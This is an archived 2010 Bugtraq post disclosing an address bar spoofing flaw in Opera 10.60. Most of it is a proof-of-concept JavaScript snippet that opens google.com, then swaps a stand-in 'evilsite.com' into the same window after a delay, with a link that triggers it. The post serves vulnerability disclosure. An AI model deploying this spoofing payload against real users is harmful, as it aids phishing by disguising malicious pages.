lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201007150534.o6F5YTqB006931@www3.securityfocus.com>
Date: Wed, 14 Jul 2010 23:34:29 -0600
From: info@...uritylab.ir
To: bugtraq@...urityfocus.com
Subject: Opera Browser Address Bar Spoofing Vulnerability

Spoofing Code:

<script language="javascript">
function pause(pd)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < pd);
}
function Spoofing () {
win = window.open('http://www.google.com','new')
pause (3000)
win = window.open('http://www.evilsite.com','new')
}
</script>
<a href="javascript: Spoofing()">Click Here</a>
########################################################################
Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)
Tested on Opera 10.60
Original Advisory: http://pouya.info/blog/userfiles/pdf/Opera-ABS.pdf

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ